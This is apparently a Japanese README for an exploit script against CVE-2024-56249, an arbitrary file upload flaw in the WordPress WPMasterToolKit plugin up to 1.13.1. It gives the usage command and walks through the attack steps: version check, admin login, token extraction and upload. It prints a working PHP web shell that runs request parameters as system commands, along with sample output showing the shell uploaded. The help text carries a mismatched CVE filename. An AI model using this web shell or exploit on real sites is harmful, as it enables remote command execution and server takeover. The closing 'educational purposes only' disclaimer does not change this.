
WordPress WPMasterToolKit プラグイン <= 1.13.1 - 任意のファイルアップロードの脆弱性
このスクリプトは、WordPress WPMasterToolKit プラグインの任意ファイルアップロード(Arbitrary File Upload)の脆弱性を悪用し、攻撃者がサーバーにウェブシェルをアップロードできるようにします。この脆弱性はプラグインのバージョン 1.13.1 以下に存在します。
この脆弱性を悪用するには、次のコマンドを使用します:
python CVE-2024-56249.py -u <URL> -un <USERNAME> -p <PASSWORD> -fn <FILENAME>
-u / --url: 対象の WordPress URL(例: http://192.168.100.74:888/wordpress)-un / --username: WordPress 管理者ユーザー名-p / --password: WordPress 管理者パスワード-fp / --filepath: ファイルのアップロードパス(デフォルト: wp-content/uploads/2025/03)-fn / --filename: アップロードするファイル名(デフォルト: shell.php)スクリプトはまず対象 URL を調査し、WPMasterToolKit プラグインのバージョンを確認して、CVE-2024-56249 に対して脆弱かどうかを検証します。
次に、提供された認証情報を使用して WordPress 管理パネルへのログインを試みます。
ログインに成功すると、スクリプトはファイルアップロードに必要なセキュリティトークン(nonce と token)を抽出します。
抽出したトークンを使用して、指定されたファイル(例: ウェブシェル)を対象サーバーにアップロードします。
最後に、スクリプトは対象 URL からファイルにアクセスできるかどうかを確認し、アップロードが成功したかを検証します。
実行前に、シェルファイル(例: shell.php)がスクリプトと同じディレクトリに配置されていることを確認してください。これは、スクリプトがファイルを正常に特定してアップロードするために必要です。
shell.php)<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}
?>
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
python CVE-2024-56249.py -u http://target -un admin -p admin -fn shell.php
[🔍] Detected plugin version: 1.13.1
[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...
[🔑] Attempting to log in...
[✅] Authentication successful!
[📡] Extracting security tokens...
[✅] Extracted nonce: e4ae47c8d8
[✅] Extracted token: e4ae47c8d8
[📤] Attempting to upload shell.php to wp-content/uploads/2025/03...
[✅] Upload request sent successfully.
[🔥] Shell successfully uploaded! Access it here: http://target/wp-content/uploads/2025/03/shell.php
usage: CVE-2025-1307.py [-h] -u URL -un USERNAME -p PASSWORD [-fp FILEPATH] [-fn FILENAME]
Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)
-un, --username USERNAME
WordPress admin username
-p, --password PASSWORD
WordPress admin password
-fp, --filepath FILEPATH
File upload path (default: wp-content/uploads/2025/03)
-fn, --filename FILENAME
File name to upload (default: shell.php)
このツールは教育目的のみを意図しています。使用は自己責任で行ってください。作者は、このツールの誤用またはそれによって生じたいかなる損害についても責任を負いません。
Nxploit | Khaled Alenazi によるエクスプロイトスクリプト